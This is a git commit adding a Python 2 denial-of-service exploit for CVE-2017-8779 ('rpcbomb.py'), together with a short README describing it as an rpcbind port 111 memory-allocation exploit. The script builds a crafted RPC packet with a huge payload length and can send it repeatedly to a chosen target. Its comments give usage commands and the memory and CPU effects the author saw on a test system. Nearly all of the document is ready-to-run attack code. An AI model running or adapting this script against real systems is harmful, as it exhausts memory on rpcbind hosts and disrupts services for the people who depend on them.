CVE-2017-8779

2017-06-02 09:28:39 +02:00
commit e20926dc95
2 changed files with 88 additions and 0 deletions
--- a/CVE-2017-8779_rpcbomb.py
+++ b/CVE-2017-8779_rpcbomb.py
@@ -0,0 +1,83 @@
+#!/usr/bin/env python2
+#
+# CVE-2017-8779 aka rpcbomb.py
+# python implementation of rpcbomb
+# find page of bug author here: https://guidovranken.wordpress.com/
+# original ruby exploit: https://www.exploit-db.com/exploits/41974
+# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779
+# 
+# this one comes with loop and single packet, to consume memory over time and not just once
+#
+# i was not able to observe any sort of crash or alike
+# on the testsystem the cpu consumption went up to 50% (1 CPU)
+# memory allocation was done
+# syslogd reportedly mentions out of memory from rpcbind
+# depending on the environment and service offered probably interesting
+#
+# one packet
+# ./rpcbomb.py -t 127.0.0.1
+# 
+# define memory allocation
+# ./rpcbomb.py -t 127.0.0.1 -l 1024
+#
+# endless mode
+# ./rpcbomb.py -t 127.0.0.1 -e
+#
+# 2nd June 2017
+# by dash
+
+import os
+import sys
+import struct
+import socket
+import argparse
+
+def run(args):
+
+	ip = args.ip
+	paylen = args.malloc
+	port = args.port
+
+	pkt = struct.pack('!I',0)	# xid
+	pkt += struct.pack('!I',0)	# message type CALL
+	pkt += struct.pack('!I',2)	# RPC version 2
+	pkt += struct.pack('!I',100000)	# Program
+	pkt += struct.pack('!I',4)	# Program version
+	pkt += struct.pack('!I',9)	# Procedure
+	pkt += struct.pack('!I',0)	# Creds AUTH_NULL
+	pkt += struct.pack('!I',0)	# Creds len 0
+	pkt += struct.pack('!I',0)	# Creds AUTH_NULL
+	pkt += struct.pack('!I',0)	# Creds len 0
+	pkt += struct.pack('!I',0)	# Program: 0
+	pkt += struct.pack('!I',0)	# Ver
+	pkt += struct.pack('!I',4)	# Proc
+	pkt += struct.pack('!I',4)	# Argument length
+	pkt += struct.pack('!I',paylen)	# Payloadlen
+
+	while 1:
+		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+		s.sendto(pkt, (ip, port))
+		data, addr = s.recvfrom(16384)
+		print '.',
+		sys.stdout.flush()
+		if not args.endless:
+			break
+	
+	print
+	print 'Done'
+
+def main():
+	parser_desc = 'rpcbomb - python exploit by dash'
+	prog_desc = 'portbind memory exhaustion exploit'
+	parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc)
+	parser.add_argument("-t","--target",action="store",required=True,help='host to send exploit',dest='ip')
+	parser.add_argument("-p","--port",action="store",required=False,help='port exploit to send to',dest='port', default=111, type=int)
+	parser.add_argument("-l","--len",action="store",required=False,help='memory to allocate',dest='malloc',default=4294967295, type=int)
+	parser.add_argument("-e","--endless",action="store_true",required=False,help='send packets constantly',dest='endless')
+
+
+	args = parser.parse_args()
+	run(args)
+
+if __name__ == "__main__":
+	main()
--- a/README.md
+++ b/README.md
@@ -0,0 +1,5 @@
+# Exploits DoS
+
+CVE-2017-8779 aka rpcbomb.py
+
+rpcbind 111 memory allocation exploit